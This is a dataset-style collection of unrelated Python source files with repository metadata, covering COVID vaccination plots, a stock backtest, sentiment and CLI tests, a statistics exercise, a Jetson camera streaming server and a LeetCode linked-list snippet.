'Dose 2 data from PHE dashboard/API, Booster data collected from NI dashboard',
'https://twitter.com/ni_covid19_data'
]
)
p.save('ni-boosters-%s.png'%(datetime.datetime.now().date().strftime('%Y-%m-%d')))
p
# %%
| 46.72549 | 193 | 0.652749 | # %%
import datetime
import pandas
import altair
from plot_shared import plot_points_average_and_trend
# %%
df = pandas.read_csv('https://api.coronavirus.data.gov.uk/v2/data?areaType=nation&metric=cumPeopleVaccinatedFirstDoseByPublishDate&metric=cumPeopleVaccinatedSecondDoseByPublishDate&format=csv')
df.rename(columns={
'cumPeopleVaccinatedFirstDoseByPublishDate': 'First',
'cumPeopleVaccinatedSecondDoseByPublishDate': 'Second',
'areaName': 'Nation',
'date': 'Publication Date'
}, inplace=True)
df = df.drop(columns=['areaCode','areaType']).melt(id_vars=['Publication Date','Nation'], var_name='Dose', value_name='People')
# %%
ni = pandas.read_csv('../sam/doses.csv')
ni['Dose'] = ni['Dose'].str.replace('Dose 1', 'First')
ni['Dose'] = ni['Dose'].str.replace('Dose 2', 'Second')
ni['Dose'] = ni['Dose'].str.replace('Dose 3', 'Third')
# %%
history = df[df['Nation']=='Northern Ireland'][['Publication Date','Dose','People']]
ni.rename(columns={'Date':'Publication Date','Total':'People'}, inplace=True)
all = history.merge(ni, on=['Publication Date','Dose'], how='outer', suffixes=('','_bot'))
all['People'] = all['People'].fillna(all['People_bot'])
all = all[['Publication Date','Dose','People']]
# %%
boosters = all[all['Dose']=='Booster'][['Publication Date','People']]
boosters['Publication Date'] = pandas.to_datetime(boosters['Publication Date'])
dose2s = all[all['Dose']=='Second'][['Publication Date','People']]
dose2s['Publication Date'] = pandas.to_datetime(dose2s['Publication Date'])
dose2s['Booster Target Date 6M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183, unit='d')
dose2s['Booster Target Date 7M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+31, unit='d')
dose2s['Booster Target Date 8M'] = pandas.to_datetime(dose2s['Publication Date']) + pandas.to_timedelta(183+62, unit='d')
boosters = boosters.merge(dose2s[['Booster Target Date 6M','People']], left_on='Publication Date', right_on='Booster Target Date 6M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','People','People_target']]
boosters.rename(columns={'People':'Booster doses', 'People_target': 'Second doses 6 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 7M','People']], left_on='Publication Date', right_on='Booster Target Date 7M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 7 months earlier'}, inplace=True)
boosters = boosters.merge(dose2s[['Booster Target Date 8M','People']], left_on='Publication Date', right_on='Booster Target Date 8M', how='left', suffixes=('', '_target'))
boosters = boosters[['Publication Date','Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','People']]
boosters.rename(columns={'People': 'Second doses 8 months earlier'}, inplace=True)
boosters = boosters.melt(id_vars='Publication Date', var_name='Metric', value_name='Doses')
# %%
plot_points_average_and_trend(
[
{
'points': None,
'line': all.set_index(['Publication Date','Dose'])['People'],
'colour': 'Dose',
'date_col': 'Publication Date',
'x_title': 'Publication Date',
'y_title': 'Total doses',
'scales': ['linear'],
'height': 450,
'width': 800,
},
],
'NI COVID-19 vaccination progress up to %s' %(
datetime.datetime.today().strftime('%A %-d %B %Y'),
),
[
'Dose 1/2 data from PHE dashboard/API, Dose 3/Booster collected from NI dashboard',
'https://twitter.com/ni_covid19_data'
]
)
# %%
p = plot_points_average_and_trend(
[
{
'points': None,
'line': boosters.set_index(['Publication Date','Metric'])['Doses'],
'colour': 'Metric',
'date_col': 'Publication Date',
'x_title': 'Date',
'y_title': 'Total doses',
'scales': ['linear'],
'height': 450,
'width': 800,
# 'colour_domain': ['Booster doses','Second doses 6 months earlier','Second doses 7 months earlier','Second doses 8 months earlier'],
# 'colour_range': ['#ff0000','#2b7e9e','#52b4cf','#7eedff'],
},
],
'NI COVID-19 booster vaccination progress vs second dose up to %s' %(
datetime.datetime.today().strftime('%A %-d %B %Y'),
),
[
'Dose 2 data from PHE dashboard/API, Booster data collected from NI dashboard',
'https://twitter.com/ni_covid19_data'
]
)
p.save('ni-boosters-%s.png'%(datetime.datetime.now().date().strftime('%Y-%m-%d')))
p
# %%
| 0 | 0 | 0 |
12d73c6d2017c67c4a8634393e9f0c3835f37434 | 2,369 | py | Python | stock/strategy/gapup.py | shenzhongqiang/cnstock_py | 2bb557657a646acb9d20d3ce78e15cf68390f8ea | [
"MIT"
] | 2 | 2016-10-31T04:05:11.000Z | 2017-04-17T08:46:53.000Z | stock/strategy/gapup.py | shenzhongqiang/cnstock_py | 2bb557657a646acb9d20d3ce78e15cf68390f8ea | [
"MIT"
] | null | null | null | stock/strategy/gapup.py | shenzhongqiang/cnstock_py | 2bb557657a646acb9d20d3ce78e15cf68390f8ea | [
"MIT"
] | null | null | null | import sys
import copy
import numpy as np
import pandas as pd
from sklearn.svm import SVR
import matplotlib.pyplot as plt
from matplotlib.finance import candlestick
from matplotlib.dates import date2num, WeekdayLocator, DateFormatter, MONDAY, MonthLocator
from stock.utils.symbol_util import *
from stock.globalvar import *
from stock.marketdata import *
from stock.filter.utils import *
symbols = get_stock_symbols('all')
marketdata = backtestdata.BackTestData("160105")
x = []
y = []
history = marketdata.get_archived_history_in_file("sh000001")
history.reverse()
dates = map(lambda x: x.date, history)
highs = map(lambda x: x.high, history)
lows = map(lambda x: x.low, history)
opens = map(lambda x: x.open, history)
closes = map(lambda x: x.close, history)
volumes = map(lambda x: x.volume, history)
df = pd.DataFrame({"high": highs,
"low": lows,
"open": opens,
"close": closes,
"volume": volumes}, index=dates)
df['last_close'] = df.close.shift(1)
df['next_open'] = df.open.shift(-1)
df['gapup'] = pd.Series(df.open / df.close.shift(1) - 1)
df.index = pd.to_datetime(df.index, format='%y%m%d')
df['chg'] = df['open'].pct_change().shift(-1)
#df['chg'] = df['close'] / df['open'] - 1
df['ma20'] = pd.rolling_mean(df.close, 20).shift(1)
result_df = df['2015-01-01': '2015-12-30']
result_df = result_df[result_df.ma20 > result_df.ma20.shift(1)]
gap_df = result_df[result_df.gapup > 0.002]
print gap_df
pl = (gap_df.chg + 1).cumprod()
j = np.argmax(np.maximum.accumulate(pl) - pl)
i = np.argmax(pl[:j])
max_drawdown = pl[i] - pl[j]
print len(pl), max_drawdown, pl[-1]
fig = plt.figure()
dates = gap_df.index
ax2 = fig.add_subplot(1,1,1)
ax2.xaxis.set_major_formatter(DateFormatter("%Y%m%d"))
ax2.xaxis_date()
plt.setp(plt.gca().get_xticklabels(), rotation=90, horizontalalignment='right')
ax2.plot(dates, pl)
plt.show()
#''' tuning code
x = []
y = []
z = []
d = []
for gap in np.linspace(-0.02, 0.02, 1000):
gap_df = result_df[result_df.gapup > gap]
if len(gap_df.values) < 1:
continue
pl = (gap_df.chg + 1).cumprod()
j = np.argmax(np.maximum.accumulate(pl) - pl)
i = np.argmax(pl[:j])
max_drawdown = pl[i] - pl[j]
x.append(gap)
y.append(pl[-1])
z.append(max_drawdown)
d.append(gap_df.chg.std())
fig, axes = plt.subplots(3, 1)
axes[0].plot(x, y)
axes[1].plot(x, z)
axes[2].plot(x, d)
plt.show()
#'''
| 28.890244 | 90 | 0.67919 | import sys
import copy
import numpy as np
import pandas as pd
from sklearn.svm import SVR
import matplotlib.pyplot as plt
from matplotlib.finance import candlestick
from matplotlib.dates import date2num, WeekdayLocator, DateFormatter, MONDAY, MonthLocator
from stock.utils.symbol_util import *
from stock.globalvar import *
from stock.marketdata import *
from stock.filter.utils import *
symbols = get_stock_symbols('all')
marketdata = backtestdata.BackTestData("160105")
x = []
y = []
history = marketdata.get_archived_history_in_file("sh000001")
history.reverse()
dates = map(lambda x: x.date, history)
highs = map(lambda x: x.high, history)
lows = map(lambda x: x.low, history)
opens = map(lambda x: x.open, history)
closes = map(lambda x: x.close, history)
volumes = map(lambda x: x.volume, history)
df = pd.DataFrame({"high": highs,
"low": lows,
"open": opens,
"close": closes,
"volume": volumes}, index=dates)
df['last_close'] = df.close.shift(1)
df['next_open'] = df.open.shift(-1)
df['gapup'] = pd.Series(df.open / df.close.shift(1) - 1)
df.index = pd.to_datetime(df.index, format='%y%m%d')
df['chg'] = df['open'].pct_change().shift(-1)
#df['chg'] = df['close'] / df['open'] - 1
df['ma20'] = pd.rolling_mean(df.close, 20).shift(1)
result_df = df['2015-01-01': '2015-12-30']
result_df = result_df[result_df.ma20 > result_df.ma20.shift(1)]
gap_df = result_df[result_df.gapup > 0.002]
print gap_df
pl = (gap_df.chg + 1).cumprod()
j = np.argmax(np.maximum.accumulate(pl) - pl)
i = np.argmax(pl[:j])
max_drawdown = pl[i] - pl[j]
print len(pl), max_drawdown, pl[-1]
fig = plt.figure()
dates = gap_df.index
ax2 = fig.add_subplot(1,1,1)
ax2.xaxis.set_major_formatter(DateFormatter("%Y%m%d"))
ax2.xaxis_date()
plt.setp(plt.gca().get_xticklabels(), rotation=90, horizontalalignment='right')
ax2.plot(dates, pl)
plt.show()
#''' tuning code
x = []
y = []
z = []
d = []
for gap in np.linspace(-0.02, 0.02, 1000):
gap_df = result_df[result_df.gapup > gap]
if len(gap_df.values) < 1:
continue
pl = (gap_df.chg + 1).cumprod()
j = np.argmax(np.maximum.accumulate(pl) - pl)
i = np.argmax(pl[:j])
max_drawdown = pl[i] - pl[j]
x.append(gap)
y.append(pl[-1])
z.append(max_drawdown)
d.append(gap_df.chg.std())
fig, axes = plt.subplots(3, 1)
axes[0].plot(x, y)
axes[1].plot(x, z)
axes[2].plot(x, d)
plt.show()
#'''
| 0 | 0 | 0 |
99b469d88749b5c5e4fcfb6f7404572eef939fc6 | 62 | py | Python | mplibtest.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | mplibtest.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | mplibtest.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
plt.plot(range(10))
plt.show() | 20.666667 | 31 | 0.774194 | import matplotlib.pyplot as plt
plt.plot(range(10))
plt.show() | 0 | 0 | 0 |
87496910ea9ab1a763212c44a602527db390c55c | 1,317 | py | Python | cli/test/functional/test_step_functions.py | mattsb42/accretion | 7cce5f4ed6d290bd9314b116be91417ded6b0f64 | [
"Apache-2.0"
] | 1 | 2019-10-19T11:18:17.000Z | 2019-10-19T11:18:17.000Z | cli/test/functional/test_step_functions.py | mattsb42/accretion | 7cce5f4ed6d290bd9314b116be91417ded6b0f64 | [
"Apache-2.0"
] | 13 | 2019-06-10T07:03:26.000Z | 2019-11-06T01:09:38.000Z | cli/test/functional/test_step_functions.py | mattsb42/accretion | 7cce5f4ed6d290bd9314b116be91417ded6b0f64 | [
"Apache-2.0"
] | null | null | null | """Functional tests for ``accretion_cli._stepfunctions``."""
import json
import pytest
from accretion_cli._templates.services.stepfunctions import _artifact_builder_workflow, _replication_listener_workflow
from .functional_test_utils import load_vector
pytestmark = [pytest.mark.local, pytest.mark.functional]
| 29.266667 | 118 | 0.759301 | """Functional tests for ``accretion_cli._stepfunctions``."""
import json
import pytest
from accretion_cli._templates.services.stepfunctions import _artifact_builder_workflow, _replication_listener_workflow
from .functional_test_utils import load_vector
pytestmark = [pytest.mark.local, pytest.mark.functional]
def _assert_equal_workflows(test, expected):
assert test == expected
test_json = json.dumps(test, indent=4)
expected_json = json.dumps(expected, indent=4)
assert test_json == expected_json
def test_artifact_builder_workflow():
expected = load_vector("artifact_builder_workflow")
test = _artifact_builder_workflow(
parse_requirements_arn="${ParseRequirementsFunction.Arn}",
build_python_36_arn="${PythonBuilder36Function.Arn}",
build_python_37_arn="${PythonBuilder37Function.Arn}",
)
_assert_equal_workflows(test, expected)
def test_replication_listener_workflow():
expected = load_vector("replication_listener_workflow")
test = _replication_listener_workflow(
filter_arn="${EventFilterFunction.Arn}",
locate_artifact_arn="${ArtifactLocatorFunction.Arn}",
publish_layer_arn="${LayerVersionPublisherFunction.Arn}",
sns_topic_arn="${NotifyTopic}",
)
_assert_equal_workflows(test, expected)
| 931 | 0 | 69 |
1e2b33389dc089f41107ab2ec2a2cb95a2e849f3 | 5,167 | py | Python | tests/test_tweet_sentiment.py | chrisfalter/BLM | eeb3eb3e011ec2ec02a21f90451422b5e22c2b9e | [
"MIT"
] | 1 | 2021-06-13T15:55:49.000Z | 2021-06-13T15:55:49.000Z | tests/test_tweet_sentiment.py | chrisfalter/BLM | eeb3eb3e011ec2ec02a21f90451422b5e22c2b9e | [
"MIT"
] | null | null | null | tests/test_tweet_sentiment.py | chrisfalter/BLM | eeb3eb3e011ec2ec02a21f90451422b5e22c2b9e | [
"MIT"
] | null | null | null | import pytest
from src.tweet_sentiment import (
EmoScores,
PronounCounts,
SentimentAnalysis,
summarize_sentiment,
_get_emotion_scores,
_get_pronoun_counts,
_get_sentiment
)
sample_text = "It was the best of times, it was the worst of times, " \
"it was the age of wisdom, it was the age of foolishness, " \
"it was the epoch of belief, it was the epoch of incredulity, " \
"it was the season of Life, it was the season of Darkness, " \
"it was the spring of hope, it was the winter of despair, " \
"we had everything before us, we had nothing before us, " \
"we were all going direct to Heaven, we were all going direct the other way --" \
"in short, the period was so far the like present period, that some of its noisiest authorities " \
"insisted on its being received, for good or for evil, in the superlative degree of comparison only. " \
"I'd always say, you'll only live once. Let's go, y'all!" # Added for testing; Dickens did not say this!
| 35.881944 | 108 | 0.689375 | import pytest
from src.tweet_sentiment import (
EmoScores,
PronounCounts,
SentimentAnalysis,
summarize_sentiment,
_get_emotion_scores,
_get_pronoun_counts,
_get_sentiment
)
sample_text = "It was the best of times, it was the worst of times, " \
"it was the age of wisdom, it was the age of foolishness, " \
"it was the epoch of belief, it was the epoch of incredulity, " \
"it was the season of Life, it was the season of Darkness, " \
"it was the spring of hope, it was the winter of despair, " \
"we had everything before us, we had nothing before us, " \
"we were all going direct to Heaven, we were all going direct the other way --" \
"in short, the period was so far the like present period, that some of its noisiest authorities " \
"insisted on its being received, for good or for evil, in the superlative degree of comparison only. " \
"I'd always say, you'll only live once. Let's go, y'all!" # Added for testing; Dickens did not say this!
def test_getEmotionScores_shouldReturnPositiveValues_whenAllEmotionsIncluded():
scores = _get_emotion_scores(sample_text)
assert scores.trust > 0.0
assert scores.anticipation > 0.0
assert scores.joy > 0.0
assert scores.surprise > 0.0
assert scores.anger > 0.0
assert scores.disgust > 0.0
assert scores.fear > 0.0
assert scores.sadness > 0.0
def test_getEmotionScores_shouldReturnSomeZeros_whenSomeEmotionsAbsent():
sample = "I love my family. They make me so happy!"
scores = _get_emotion_scores(sample)
assert scores.sadness == 0.0
assert scores.fear == 0.0
assert scores.anger == 0.0
assert scores.disgust == 0.0
assert scores.joy > 0.0
assert scores.trust > 0.0
def test_getEmotionScores_returnsZeros_whenTextIsVeryShort():
sample = "Gondwana"
scores = _get_emotion_scores(sample)
assert scores.trust == 0.0
assert scores.anticipation == 0.0
assert scores.surprise == 0.0
assert scores.sadness == 0.0
assert scores.fear == 0.0
assert scores.anger == 0.0
assert scores.disgust == 0.0
assert scores.joy == 0.0
def test_getEmotionScores_handlesAnticipationCorrectly():
# the affect_frequency dict sometimes uses a key of 'anticip' rather than 'anticipation'
# this behavior seems like a bug in NRCLex.
text = 'Arrested for hanging a banner. While Darren Wilson still remains free ' \
'for killing a Black teen. #BlackLivesMatter http://t.co/de8xpE2v5r'
scores = _get_emotion_scores(text)
assert scores.anticipation == 0.0
def test_getPronounCounts_shouldBeAccurate_whenContractionsUsed():
counts = _get_pronoun_counts(sample_text)
assert counts.first_singular == 1
assert counts.first_plural == 7
assert counts.second == 2
assert counts.third == 12
def test_pronounCounts_shouldDoMathOperations():
pc1 = PronounCounts(1, 2, 3, 4)
pc2 = PronounCounts(1, 2, 3, 4)
assert pc1 == pc2
the_sum = pc1 + pc2
assert the_sum == PronounCounts(2, 4, 6, 8)
assert the_sum / 2 == pc1
pc1 += pc2
assert pc1 == PronounCounts(2, 4, 6, 8)
assert pc2 * 2 == PronounCounts(2, 4, 6, 8)
def test_getSentiment_shouldReturnPositive_whenTweetIsHappy():
tweet = "I'm so happy today!"
sentiment = _get_sentiment(tweet)
assert sentiment > 0.0
assert sentiment <= 1.0
def test_getSentiment_shouldReturnNegative_whenTweetIsSad():
tweet = "I'm sad, tears are pouring from my eyes, I'm so sad."
sentiment = _get_sentiment(tweet)
assert sentiment < 0.0
assert sentiment >= -1.0
def test_pronounCounts_shouldReturnNormalizedValues_whenGetProportionsCalled():
pc = PronounCounts(1, 2, 3, 4)
result = pc.get_proportions()
assert result == PronounCounts(0.1, 0.2, 0.3, 0.4)
def test_pronounCountsGetProportions_shouldReturnZeros_whenNoPronouns():
pc = PronounCounts(0, 0, 0, 0)
result = pc.get_proportions()
assert result == pc
def test_emoScores_shouldPerformMathOps_whenUsedWithMathSyntax():
emos = EmoScores(0.2, 0.2, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1)
twice_emos = emos * 2
assert twice_emos == EmoScores(0.2 * 2, 0.2 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2, 0.1 * 2)
assert twice_emos / 2 == emos
assert emos + emos == twice_emos
def test_summarizeSentiment_shouldNormalizeSummedSentiments_whenGivenList():
sa1 = SentimentAnalysis(
pronoun_counts=PronounCounts(0, 1, 2, 5),
emo_scores=EmoScores(0, 0.25, 0, 0.25, 0, 0.25, 0, 0.25),
sentiment=0.4
)
sa2 = SentimentAnalysis(
pronoun_counts=PronounCounts(0, 1, 2, 5),
emo_scores=EmoScores(0.25, 0, 0.25, 0, 0.25, 0, 0.25, 0),
sentiment=0.2
)
expected = SentimentAnalysis(
pronoun_counts=PronounCounts(0.0, 0.125, 0.25, 0.625),
emo_scores=EmoScores(0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125, 0.125),
sentiment=0.3
)
actual = summarize_sentiment([sa1, sa2])
assert actual.pronoun_counts == expected.pronoun_counts
assert actual.emo_scores == expected.emo_scores
assert actual.sentiment == pytest.approx(expected.sentiment)
| 3,863 | 0 | 276 |
a8ff93872dcb01832b50b6a88d9561e1d8f9eda9 | 2,765 | py | Python | Banking-Inferences(Inferential-Statistics)/code.py | RohanBarghare/ga-learner-dsmp-repo | ec5aa9697d79da48b6e3446d2a9bc4f0544560c9 | [
"MIT"
] | null | null | null | Banking-Inferences(Inferential-Statistics)/code.py | RohanBarghare/ga-learner-dsmp-repo | ec5aa9697d79da48b6e3446d2a9bc4f0544560c9 | [
"MIT"
] | null | null | null | Banking-Inferences(Inferential-Statistics)/code.py | RohanBarghare/ga-learner-dsmp-repo | ec5aa9697d79da48b6e3446d2a9bc4f0544560c9 | [
"MIT"
] | null | null | null | # --------------
import pandas as pd
import scipy.stats as stats
import math
import numpy as np
import warnings
warnings.filterwarnings('ignore')
#Sample_Size
sample_size=2000
#Z_Critical Score
z_critical = stats.norm.ppf(q = 0.95)
# path [File location variable]
data=pd.read_csv(path)
#Code starts here
data_sample=data.sample(n=sample_size,random_state=0)
sample_mean=data_sample['installment'].mean()
sample_std=data_sample['installment'].std()
margin_of_error= z_critical * (sample_std/math.sqrt(sample_size))
confidence_interval =(sample_mean - margin_of_error,
sample_mean + margin_of_error)
true_mean=data['installment'].mean()
print("True mean :{}".format(true_mean))
# --------------
import matplotlib.pyplot as plt
import numpy as np
#Different sample sizes to take
sample_size=np.array([20,50,100])
#Code starts here
fig ,axes = plt.subplots(nrows = 3 , ncols = 1)
for i in range(len(sample_size)):
m = []
for j in range(1000):
data['installment'].sample(n=sample_size[i])
m.append(data['installment'].mean())
mean_series = pd.Series(m)
axes[i].hist(mean_series)
# --------------
#Importing header files
from statsmodels.stats.weightstats import ztest
#Code starts here
data['int.rate'] = data['int.rate'].str.replace('%','')
data['int.rate'] = data['int.rate'].astype(float)/100
x1 = data[data['purpose']=='small_business']['int.rate']
z_statistic,p_value= ztest(x1,value=data['int.rate'].mean(),alternative='larger')
if p_value < 0.05: # alpha value is 0.05 or 5%
print(" we are rejecting null hypothesis")
else:
print("we are failed to reject null hypothesis")
# --------------
#Importing header files
from statsmodels.stats.weightstats import ztest
#Code starts here
x1=data[data['paid.back.loan']=='No']['installment']
x2=data[data['paid.back.loan']=='Yes']['installment']
z_statistic,p_value=ztest(x1,x2)
if p_value < 0.05:
print('we are rejecting null ')
else:
print('we are failed to reject null hypothesis')
# --------------
#Importing header files
from scipy.stats import chi2_contingency
#Critical value
critical_value = stats.chi2.ppf(q = 0.95, # Find the critical value for 95% confidence*
df = 6) # Df = number of variable categories(in purpose) - 1
#Code starts here
yes = data[data['paid.back.loan']=='Yes']['purpose'].value_counts()
no = data[data['paid.back.loan']=='No']['purpose'].value_counts()
observed = pd.concat([yes.transpose(),no.transpose()], 1,keys=['Yes','No'])
chi2, p, dof, ex = chi2_contingency(observed, correction=False)
print("Critical value")
print(critical_value)
print("Chi Statistic")
print(chi2)
# --------------
print(chi2)
| 27.929293 | 88 | 0.670163 | # --------------
import pandas as pd
import scipy.stats as stats
import math
import numpy as np
import warnings
warnings.filterwarnings('ignore')
#Sample_Size
sample_size=2000
#Z_Critical Score
z_critical = stats.norm.ppf(q = 0.95)
# path [File location variable]
data=pd.read_csv(path)
#Code starts here
data_sample=data.sample(n=sample_size,random_state=0)
sample_mean=data_sample['installment'].mean()
sample_std=data_sample['installment'].std()
margin_of_error= z_critical * (sample_std/math.sqrt(sample_size))
confidence_interval =(sample_mean - margin_of_error,
sample_mean + margin_of_error)
true_mean=data['installment'].mean()
print("True mean :{}".format(true_mean))
# --------------
import matplotlib.pyplot as plt
import numpy as np
#Different sample sizes to take
sample_size=np.array([20,50,100])
#Code starts here
fig ,axes = plt.subplots(nrows = 3 , ncols = 1)
for i in range(len(sample_size)):
m = []
for j in range(1000):
data['installment'].sample(n=sample_size[i])
m.append(data['installment'].mean())
mean_series = pd.Series(m)
axes[i].hist(mean_series)
# --------------
#Importing header files
from statsmodels.stats.weightstats import ztest
#Code starts here
data['int.rate'] = data['int.rate'].str.replace('%','')
data['int.rate'] = data['int.rate'].astype(float)/100
x1 = data[data['purpose']=='small_business']['int.rate']
z_statistic,p_value= ztest(x1,value=data['int.rate'].mean(),alternative='larger')
if p_value < 0.05: # alpha value is 0.05 or 5%
print(" we are rejecting null hypothesis")
else:
print("we are failed to reject null hypothesis")
# --------------
#Importing header files
from statsmodels.stats.weightstats import ztest
#Code starts here
x1=data[data['paid.back.loan']=='No']['installment']
x2=data[data['paid.back.loan']=='Yes']['installment']
z_statistic,p_value=ztest(x1,x2)
if p_value < 0.05:
print('we are rejecting null ')
else:
print('we are failed to reject null hypothesis')
# --------------
#Importing header files
from scipy.stats import chi2_contingency
#Critical value
critical_value = stats.chi2.ppf(q = 0.95, # Find the critical value for 95% confidence*
df = 6) # Df = number of variable categories(in purpose) - 1
#Code starts here
yes = data[data['paid.back.loan']=='Yes']['purpose'].value_counts()
no = data[data['paid.back.loan']=='No']['purpose'].value_counts()
observed = pd.concat([yes.transpose(),no.transpose()], 1,keys=['Yes','No'])
chi2, p, dof, ex = chi2_contingency(observed, correction=False)
print("Critical value")
print(critical_value)
print("Chi Statistic")
print(chi2)
# --------------
print(chi2)
| 0 | 0 | 0 |
090738636e324433c3033993224836a0912177a0 | 3,453 | py | Python | face_streaming_server.py | PNUIOTLAB/face_recognition_client | ee44ebbc8e76cb940577dd9ce31fe06a09c18de6 | [
"BSL-1.0"
] | null | null | null | face_streaming_server.py | PNUIOTLAB/face_recognition_client | ee44ebbc8e76cb940577dd9ce31fe06a09c18de6 | [
"BSL-1.0"
] | null | null | null | face_streaming_server.py | PNUIOTLAB/face_recognition_client | ee44ebbc8e76cb940577dd9ce31fe06a09c18de6 | [
"BSL-1.0"
] | null | null | null | import cv2
import time
import threading
from flask import Response, Flask
import time
import os
import sys
import socket
import select
# Flask 객체로 Image frame 전달
global video_frame
video_frame = None
# 다양한 브라우저에서 프레임들의 thread-safe 출력을 잠근다.
global thread_lock
thread_lock = threading.Lock()
# Raspberry Camera에 접근하기 위한 GStreamer 파이프라인
GSTREAMER_PIPELINE = 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=21/1 ! nvvidconv flip-method=0 ! video/x-raw, width=960, height=616, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink wait-on-eos=false max-buffers=1 drop=True'
# 어플리케이션을 위한 Flask 오브젝트 생성
app = Flask(__name__)
@app.route("/")
if __name__ == '__main__':
IP = '192.168.0.50'
PORT = 5040
ADDR = (IP, PORT)
SIZE = 1024
Server_socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Server_socket1.bind(ADDR)
Server_socket1.listen()
read_socket_list = [Server_socket1]
conn_read_socket_list, conn_write_socket_list, conn_except_socket_list =select.select(read_socket_list, [], [])
for conn_read_socket in conn_read_socket_list:
if conn_read_socket == Server_socket1:
client_socket, client_addr = Server_socket1.accept()
msg = client_socket.recv(SIZE)
if msg.decode('UTF-8') == 'A':
print("실행합니다.")
# thread를 생성하고 이미지 프레임을 캡처하는 메소드를 첨가
process_thread = threading.Thread(target=captureFrames)
process_thread.daemon = True
# Start the thread
process_thread.start()
# start the Flask Web Application
# While it can be run on any feasible IP, IP = 192.168.0.50 renders the web app on
# the host machine's localhost and is discoverable by other machines on the same network
app.run("192.168.0.50", port="8000")
| 31.108108 | 313 | 0.637706 | import cv2
import time
import threading
from flask import Response, Flask
import time
import os
import sys
import socket
import select
# Flask 객체로 Image frame 전달
global video_frame
video_frame = None
# 다양한 브라우저에서 프레임들의 thread-safe 출력을 잠근다.
global thread_lock
thread_lock = threading.Lock()
# Raspberry Camera에 접근하기 위한 GStreamer 파이프라인
GSTREAMER_PIPELINE = 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=21/1 ! nvvidconv flip-method=0 ! video/x-raw, width=960, height=616, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink wait-on-eos=false max-buffers=1 drop=True'
# 어플리케이션을 위한 Flask 오브젝트 생성
app = Flask(__name__)
def restart():
print("프로그램 재시작")
executable = sys.executable
args = sys.argv[:]
args.insert(0, sys.executable)
time.sleep(1)
os.execvp(executable, args)
def captureFrames():
global video_frame, thread_lock
start_time = time.time()
# OpenCV로부터 비디오 캡처
video_capture = cv2.VideoCapture(GSTREAMER_PIPELINE, cv2.CAP_GSTREAMER)
while True and video_capture.isOpened():
return_key, frame = video_capture.read()
duration = time.time() - start_time
if not return_key:
break
# 프레임의 복사본을 생성하고 video_frame 변수에 저장
with thread_lock:
video_frame = frame.copy()
key = cv2.waitKey(30) & 0xff
if key == 27:
break
if duration >= 30:
print("20초 경과")
video_capture.release()
restart()
break
video_capture.release()
def encodeFrame():
global thread_lock
while True:
# video_frame 변수에 접근하기 위한 thread_lock 습득
with thread_lock:
global video_frame
if video_frame is None:
continue
return_key, encoded_image = cv2.imencode(".jpg", video_frame)
if not return_key:
continue
# 바이트 배열로 결과 이미지
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encoded_image) + b'\r\n')
@app.route("/")
def streamFrames():
return Response(encodeFrame(), mimetype="multipart/x-mixed-replace; boundary=frame")
if __name__ == '__main__':
IP = '192.168.0.50'
PORT = 5040
ADDR = (IP, PORT)
SIZE = 1024
Server_socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Server_socket1.bind(ADDR)
Server_socket1.listen()
read_socket_list = [Server_socket1]
conn_read_socket_list, conn_write_socket_list, conn_except_socket_list =select.select(read_socket_list, [], [])
for conn_read_socket in conn_read_socket_list:
if conn_read_socket == Server_socket1:
client_socket, client_addr = Server_socket1.accept()
msg = client_socket.recv(SIZE)
if msg.decode('UTF-8') == 'A':
print("실행합니다.")
# thread를 생성하고 이미지 프레임을 캡처하는 메소드를 첨가
process_thread = threading.Thread(target=captureFrames)
process_thread.daemon = True
# Start the thread
process_thread.start()
# start the Flask Web Application
# While it can be run on any feasible IP, IP = 192.168.0.50 renders the web app on
# the host machine's localhost and is discoverable by other machines on the same network
app.run("192.168.0.50", port="8000")
| 1,528 | 0 | 91 |
c5bc60fc16c77b9e8d2c61a215a4fe4027b0f78b | 1,401 | py | Python | LeetCode/python-R1/0024- 两两交换链表中的节点/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-08-27T11:28:03.000Z | 2020-12-24T07:10:22.000Z | LeetCode/python-R1/0024- 两两交换链表中的节点/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | null | null | null | LeetCode/python-R1/0024- 两两交换链表中的节点/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-09-20T09:44:01.000Z | 2020-12-24T07:10:23.000Z | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.37
工具: python == 3.7.3
"""
"""
思路:
暴力解法,直接取出所有元素,排序后再存入新的链表中
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了76.77%的用户
内存消耗 : 13.8 MB, 在所有 Python3 提交中击败了5.93%的用户
"""
# 定义链表
if __name__ == "__main__":
l1 = ListNode(1)
l1.next = ListNode(2)
l1.next.next = ListNode(3)
